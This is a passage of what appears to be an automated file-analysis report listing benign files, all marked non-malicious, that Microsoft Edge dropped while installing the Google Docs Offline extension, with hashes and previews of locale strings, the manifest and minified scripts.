                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1333
                                                                                                                                                                                                                                                                        Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                        MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                        SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                        SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                        SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1263
                                                                                                                                                                                                                                                                        Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                        MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                        SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                        SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                        SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1074
                                                                                                                                                                                                                                                                        Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                        MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                        SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                        SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                        SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):879
                                                                                                                                                                                                                                                                        Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                        MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                        SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                        SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                        SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1205
                                                                                                                                                                                                                                                                        Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                        MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                        SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                        SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                        SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):843
                                                                                                                                                                                                                                                                        Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                        MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                        SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                        SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                        SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):912
                                                                                                                                                                                                                                                                        Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                        MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                        SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                        SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                        SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):11406
                                                                                                                                                                                                                                                                        Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                        MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                        SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                        SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                        SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):854
                                                                                                                                                                                                                                                                        Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                        MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                        SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                        SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                        SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2525
                                                                                                                                                                                                                                                                        Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                        MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                        SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                        SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                        SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):97
                                                                                                                                                                                                                                                                        Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                        MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                        SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                        SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                        SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):122218
                                                                                                                                                                                                                                                                        Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                        MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                        SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                        SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                        SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):291
                                                                                                                                                                                                                                                                        Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                        MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                        SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                        SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                        SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):130866
                                                                                                                                                                                                                                                                        Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                        MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
